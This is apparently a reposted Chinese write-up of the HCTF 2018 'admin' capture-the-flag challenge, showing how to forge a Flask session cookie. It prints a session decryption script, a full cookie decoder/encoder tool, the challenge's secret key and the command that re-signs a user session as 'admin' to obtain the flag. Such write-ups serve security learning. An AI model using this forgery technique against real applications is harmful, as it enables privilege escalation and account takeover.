![[HCTF 2018]admin之Flask之session伪造,第1张](/aiimages/%5BHCTF+2018%5Dadmin%E4%B9%8BFlask%E4%B9%8Bsession%E4%BC%AA%E9%80%A0.png "[HCTF 2018]admin之Flask之session伪造,第1张")
接解法一
解法二:Flask之session伪造 原理首先要明确cookie和session的区别:cookie放在客户端,我们可以获得的。session放在服务器,我们无法拿到的,但是flask这种轻量级的框架,session就放在了客户端,因此我们能拿来修改,这就是我们能session伪造的原因。session加密了,可以用解密脚本来解密。我们将一般用户的session修改为admin的session,再用加密脚本加上秘钥来加密成admin的session就OK了。
过程1、参考文章
Flask之session伪造(从某平台学习Session身份伪造)
2、找session
3、解密脚本,我在编译器运行的。
#!/usr/bin/env python3
import sys
import zlib
from base64 import b64decode
from flask.sessions import session_json_serializer
from itsdangerous import base64_decode
def decryption(payload):
payload, sig = payload.rsplit(b'.', 1)
payload, timestamp = payload.rsplit(b'.', 1)
decompress = False
if payload.startswith(b'.'):
payload = payload[1:]
decompress = True
try:
payload = base64_decode(payload)
except Exception as e:
raise Exception('Could not base64 decode the payload because of '
'an exception')
if decompress:
try:
payload = zlib.decompress(payload)
except Exception as e:
raise Exception('Could not zlib decompress the payload before '
'decoding the payload')
return session_json_serializer.loads(payload)
if __name__ == '__main__':
# 放置session
print(decryption(".eJxFkE-LwkAMxb_KkrOHdqwXwYv0DxUypTIyJBdxtTodjQtV2bbid99Blt3k8sh7_ODlCdtj19wczO_do5nAtj3A_AkfnzAH8pjQiJE254HNeVrZWgXda6GBPcYk9YjpacqpvrBsVMhO2S8FpVbo121lKdKWHY1LV5mD0Kjbyqw8KnZosxnbOqqKXNhmCUk56KLu2Qc9Zj0WOHCRuyotY60oZiGF6UGw0IGvHZpNz0X5zSYX8rSA1wT2t-64vX-dm-t_BZOFyH5AgxEJh6UEVaj1xrmLltzrMRedlgnZtcN0feHT4o1rZXdq_kgmX7H9da47CQbEYWACj1vTvd8WDvD6AQkBa-c.YmIMmA.vkGdxjLQqP1iKcggIjNESkzPtVE".encode()))
4、运行结果,我注册的账号的为1111。
{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': '1111', 'user_id': '10'}
5、到config文件找秘钥
6、加密脚本
GITHUB给你爱
#!/usr/bin/env python3
""" Flask Session Cookie Decoder/Encoder """
__author__ = 'Wilson Sumanang, Alexandre ZANNI'
# standard imports
import sys
import zlib
from itsdangerous import base64_decode
import ast
# Abstract Base Classes (PEP 3119)
if sys.version_info[0] < 3: # < 3.0
raise Exception('Must be using at least Python 3')
elif sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
from abc import ABCMeta, abstractmethod
else: # > 3.4
from abc import ABC, abstractmethod
# Lib for argument parsing
import argparse
# external Imports
from flask.sessions import SecureCookieSessionInterface
class MockApp(object):
def __init__(self, secret_key):
self.secret_key = secret_key
if sys.version_info[0] == 3 and sys.version_info[1] < 4: # >= 3.0 && < 3.4
class FSCM(metaclass=ABCMeta):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
else: # > 3.4
class FSCM(ABC):
def encode(secret_key, session_cookie_structure):
""" Encode a Flask session cookie """
try:
app = MockApp(secret_key)
session_cookie_structure = dict(ast.literal_eval(session_cookie_structure))
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.dumps(session_cookie_structure)
except Exception as e:
return "[Encoding error] {}".format(e)
raise e
def decode(session_cookie_value, secret_key=None):
""" Decode a Flask cookie """
try:
if(secret_key==None):
compressed = False
payload = session_cookie_value
if payload.startswith('.'):
compressed = True
payload = payload[1:]
data = payload.split(".")[0]
data = base64_decode(data)
if compressed:
data = zlib.decompress(data)
return data
else:
app = MockApp(secret_key)
si = SecureCookieSessionInterface()
s = si.get_signing_serializer(app)
return s.loads(session_cookie_value)
except Exception as e:
return "[Decoding error] {}".format(e)
raise e
if __name__ == "__main__":
# Args are only relevant for __main__ usage
## Description for help
parser = argparse.ArgumentParser(
description='Flask Session Cookie Decoder/Encoder',
epilog="Author : Wilson Sumanang, Alexandre ZANNI")
## prepare sub commands
subparsers = parser.add_subparsers(help='sub-command help', dest='subcommand')
## create the parser for the encode command
parser_encode = subparsers.add_parser('encode', help='encode')
parser_encode.add_argument('-s', '--secret-key', metavar='' ,
help='Secret key', required=True)
parser_encode.add_argument('-t', '--cookie-structure', metavar='' ,
help='Session cookie structure', required=True)
## create the parser for the decode command
parser_decode = subparsers.add_parser('decode', help='decode')
parser_decode.add_argument('-s', '--secret-key', metavar='' ,
help='Secret key', required=False)
parser_decode.add_argument('-c', '--cookie-value', metavar='' ,
help='Session cookie value', required=True)
## get args
args = parser.parse_args()
## find the option chosen
if(args.subcommand == 'encode'):
if(args.secret_key is not None and args.cookie_structure is not None):
print(FSCM.encode(args.secret_key, args.cookie_structure))
elif(args.subcommand == 'decode'):
if(args.secret_key is not None and args.cookie_value is not None):
print(FSCM.decode(args.cookie_value,args.secret_key))
elif(args.cookie_value is not None):
print(FSCM.decode(args.cookie_value))
7、新建加密脚本为flask_session.py文件,秘钥为ckj123,用下面代码运行。
python flask_session.py encode -s "ckj123" -t "{'_fresh': True, '_id': b'b38c34592e979d65916f2f35bd3087d3efe6c37f0f2d624b9f45fac0a97fc3b92c3fa1a9ed48afea8bb24d1f18c110c2daa8257f5ff607f0cf2ca151db0e1fb6', 'csrf_token': b'57f35c100293753cef335c84b9df01784bb33a8f', 'image': b'DOK2', 'name': 'admin', 'user_id': '10'}
"
8、运行成功
9、将session放回原位,刷新即可得到flag。
管他黑猫白猫,能抓到老鼠的就是好猫。
欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)